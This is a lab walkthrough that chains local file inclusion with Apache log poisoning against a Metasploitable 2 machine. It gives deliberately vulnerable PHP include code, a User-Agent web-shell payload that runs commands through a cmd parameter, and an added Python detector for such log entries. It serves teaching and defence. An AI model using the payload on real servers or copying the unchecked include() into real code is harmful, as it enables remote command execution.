Exploit Webserver through Log Injection with LFI

This article shows how to combine local file inclusion with log poisoning on the target machine and gain unauthorized access with the help of the Apache access.log file.

Attacker: Kali Linux

Target: Metasploitable 2

Connect to the target using the SSH service, as shown in the following image:

ssh msfadmin@192.168.1.8

Now log in with user as "sudo" and create a folder "lfi" inside /var/www

cd /var/www

mkdir lfi

Now create a PHP file that allows the user to include a file through the file parameter. Using the file parameter, we can then execute a file that contains malicious code to gain unauthorized access to the target PC.

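<?php
   // Deliberately vulnerable: the file parameter goes to include() unchecked.
   $file = $_GET['file'];
   if(isset($file))
   {
       // Includes whatever path the client supplied
       include("$file");
   }
   else
   {
       include("index.php");
   }
?>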

I saved the above PHP code in a text file named lfi.php and shared this file.

To download lfi.php into the lfi directory, type the following command:

wget http://192.168.1.25/lfi.php

Now let’s browse the following URL: 192.168.1.8/lfi/lfi.php

In the given screenshot you can see that when I browsed the lfi.php file, it showed an error that looks like a local file inclusion vulnerability.

Now I will try to open the Apache access.log file. To explore this file, I will first give read permission to apache2 and then include the access.log file.

Now include the access.log file through the file parameter by entering the following URL in the browser.

192.168.1.8/lfi/lfi.php?file=/var/www/apache2/access.log

Now turn on Burp Suite to capture the request for the same web page.

Here you will get the intercepted data, where we need to inject our cmd command into the User-Agent header by replacing the highlighted data.

Add the command <?php system($_GET['cmd']); ?> to the User-Agent header and send the request with the GET parameters 192.168.1.8/lfi/lfi.php?file=/var/www/apache2/access.log&cmd=ps as shown in the image below. Then click Forward.

Here it will dump the log data as well as execute the command given through cmd. In the screenshot you can view both the log and the process state.

In the same manner, execute lsb_release -a through cmd and view the result in the given screenshot.
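
A defender can spot both halves of this technique in the access log itself: the PHP tag written into a logged header, and the later request whose file parameter points at a server-side path. The following is an added example, not part of the original article; it assumes Apache's combined log format, and the function names (inspect_line, scan), the patterns and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache "combined" format; quoted fields may hold backslash-escaped characters.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' \d{3} \S+ ' + QUOTED + ' ' + QUOTED + r'\s*$')
# PHP open tags (<?php, <?=, short "<? ") never belong in a logged header or URL.
PHP_TAG = re.compile(r'<\?(?:php|=|\s)', re.IGNORECASE)
# Parameter values that look like a server-side path rather than a page name.
PATH_VALUE = re.compile(r'\.\.[/\\]|^/(?:var|etc|proc)/|\.log$', re.IGNORECASE)

def inspect_line(line):
    """Return findings for one access-log line; [] means nothing suspicious."""
    m = COMBINED.match(line)
    if not m:
        return ["unparsed"]  # malformed lines are worth a manual look
    _host, request, referer, agent = m.groups()
    findings = [f"php-tag-in-{name}"
                for name, value in (("request", request), ("referer", referer), ("agent", agent))
                if PHP_TAG.search(unquote(value))]
    parts = request.split()
    if len(parts) >= 2:
        query = parts[1].partition("?")[2]
        for name, value in parse_qsl(query, keep_blank_values=True):
            if PATH_VALUE.search(unquote(value)):  # second decode catches double encoding
                findings.append(f"path-in-param:{name}")
    return findings

def scan(lines):
    """Return (line_number, findings) for every line that produced findings."""
    hits = []
    for number, line in enumerate(lines, start=1):
        findings = inspect_line(line)
        if findings:
            hits.append((number, findings))
    return hits

# Constructed sample lines (not taken from the article's screenshots).
SAMPLE_LOG = r'''
192.168.1.25 - - [10/Oct/2017:13:55:36 +0000] "GET /lfi/lfi.php HTTP/1.1" 200 312 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.25 - - [10/Oct/2017:13:56:02 +0000] "GET /lfi/lfi.php HTTP/1.1" 200 312 "-" "<?php system($_GET['cmd']); ?>"
192.168.1.25 - - [10/Oct/2017:13:56:40 +0000] "GET /lfi/lfi.php?file=%2Fvar%2Fwww%2Fapache2%2Faccess.log&cmd=ps HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
'''.strip().splitlines()

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(findings)}")
```

Detection only tells you the log was poisoned; the inclusion itself is prevented by mapping the file parameter to a fixed allowlist of pages instead of passing it to include().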

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

Source: www.hackingarticles.in